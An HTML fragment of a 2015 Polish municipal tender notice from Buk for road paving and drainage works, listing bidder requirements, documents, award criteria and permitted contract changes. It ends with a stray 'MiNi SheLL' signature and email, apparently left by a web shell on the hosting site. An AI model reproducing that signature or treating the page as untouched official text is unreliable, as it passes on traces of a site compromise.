<ul class="kh_indent_1"><li><p>W celu wykazania, że Wykonawca posiada wiedzę i doświadczenie Zamawiający żąda wskazania w wykazie robót budowlanych wykonanych w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, których przedmiotem była budowa lub przebudowa drogi o nawierzchni z kostki brukowej wraz z odwodnieniem  wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Dla 2 robót z wykazu, której wartość każdej nie może być mniejsza niż 500.000,00 zł brutto Zamawiający żąda załączenia dowodów, że robota ta została wykonana w sposób należyty oraz wskazujących, czy została wykonana zgodnie z zasadami sztuki budowlanej i prawidłowo ukończona. Wykaz wykonanych robót należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 1A do SIWZ. Dowodami , o których mowa wyżej są: poświadczenia, oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczeń, o których mowa w tirecie pierwszym. W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego roboty budowlane zostały wykonane, Wykonawca nie ma obowiązku przedkładania dowodów , o których mowa wyżej.Ocena spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowaniem, w celu wykonania zamówienia min. jedną osobą do kierowania robotami w specjalności:drogowej.
Osoba ta musi posiadać uprawnienia do wykonywania robót w swojej specjalności oraz musi posiadać aktualny wpis do właściwej izby samorządu zawodowego. Wykaz osób należy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 1B do SIWZ. Zamawiający dopuszcza odpowiadające uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej z zastrzeżeniem art. 12a oraz innych przepisów Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118 ze zm.) oraz ustawy o zasadach uznania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2008 r. Nr 63 poz. 394). Ocena spełnienia warunku zostanie dokonana wg formuły spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach (wymaganych przez Zamawiającego i podanych w SIWZ) dołączonych do oferty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony i podpisany przez osoby uprawnione do reprezentowania podmiotu lub za dowodem pełnomocnictwa - osoby upoważnione, formularz ofertowy. 2. Dowód wniesienia w należytej formie i wysokości wadium. 3. Pozostałe dokumenty i oświadczenia wymienione w SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - potencjał kadrowo - sprzętowy - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)    Terminy wykonania robót przedłuża się ile przeszkoda spowodowana jest :a)  przez okoliczność, za którą odpowiedzialny jest Zamawiający, b)  przez siłę wyższą, c) przez wstrzymanie robót przez Wielkopolskiego Powiatowego Konserwatora Zabytków  w Poznaniu lub inspektora nadzoru inwestorskiego, d) zawieszenia robót przez Zamawiającego e) wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo          zachowania należytej staranności, f) przez niekorzystne warunki atmosferyczne, niepozwalające na realizację robót, dla których określona odpowiednimi normami technologia wymaga właściwych warunków atmosferycznych. Przedłużenie terminu wykonania robót nastąpi o tyle dni, ile trwała przeszkoda w ich wykonaniu bez możliwości ubiegania się o odszkodowanie przez Wykonawcę. Podstawą do przesunięcia terminu jest wpis do dziennika budowy, potwierdzony przez inspektora nadzoru inwestorskiego oraz wniosek Wykonawcy dostarczony Zamawiającemu, 2) Po akceptacji Zamawiającego - zmiany podwykonawców,
3) Po akceptacji Zamawiającego - zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami, o których mowa w ustawie Prawo budowlane lub innych ustawach a także w SIWZ, 4) Zmiany wynagrodzenia Wykonawcy. Zmiany postanowień umowy będą mogły nastąpić w następujących okolicznościach: zmiany ustawowej wysokości VAT, w przypadku gdy w trakcie realizacji przedmiotu umowy nastąpi zmiana stawki VAT dla robót objętych przedmiotem umowy. Strony dokonają odpowiedniej zmiany wynagrodzenia umownego - dotyczy to części wynagrodzenia za roboty, których w dniu zmiany stawki VAT jeszcze nie wykonano i nie zafakturowano. 5)  Konieczność wykonania zamówień dodatkowych zgodnie z art. 67 ust. 1 pkt. 5 ustawy Prawo zamówień publicznych lub robót zamiennych ,opóźniających lub wstrzymujących realizację robót zasadniczych - termin wykonania zamówienia może ulec zmianie o okres odpowiadający wstrzymaniu lub opóźnieniu wykonywania robót zasadniczych z tego powodu - jeżeli przy zachowaniu należytej staranności z uwzględnieniem profesjonalnego charakteru Wykonawcy nie można było uniknąć zmiany terminu wykonania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.buk.gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Buk, ul. Ratuszowa 1, 64-320 Buk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2015 godzina 10:50, miejsce: Urząd Miasta i Gminy Buk, ul. Ratuszowa 1, 64-320 Buk, pokój nr 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com